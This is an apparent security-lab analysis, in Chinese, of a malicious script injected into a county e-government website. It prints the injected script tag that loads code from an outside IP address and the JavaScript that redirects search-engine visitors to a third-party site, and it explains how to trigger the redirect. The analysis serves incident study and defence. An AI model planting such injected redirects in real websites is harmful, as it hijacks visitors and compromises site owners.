乐至县电子政务大厅网站挂马分析

反黑实验室在监测到乐至县电子政务大厅网站遭到黑客挂马攻击事件后,实验室反黑自由职业者对该挂马事件进行分析。

乐至县电子政务大厅网站挂马分析

网站名称

乐至县电子政务大厅网站

网站域名

sclzzw.gov.cn

挂马页面

http://sclzzw.gov.cn/

挂马代码

<script src="http://192.250.194.36/rt.js"></script>

恶意代码

var refurl=document.referrer
if(refurl.indexOf("sogou")>0 || refurl.indexOf("baidu")>0 || refurl.indexOf("so")>0 )
window.location.href="http://www.1578118.com/";

代码分析

对页面请求来源进行判断,当请求来源包含“sogou”、“baidu”、“so”等关键字时,页面跳转至“http://www.1578118.com/”。

触发执行

设置请求头为:Referer:http://www.baidu.com/

取消
Loading...
css.php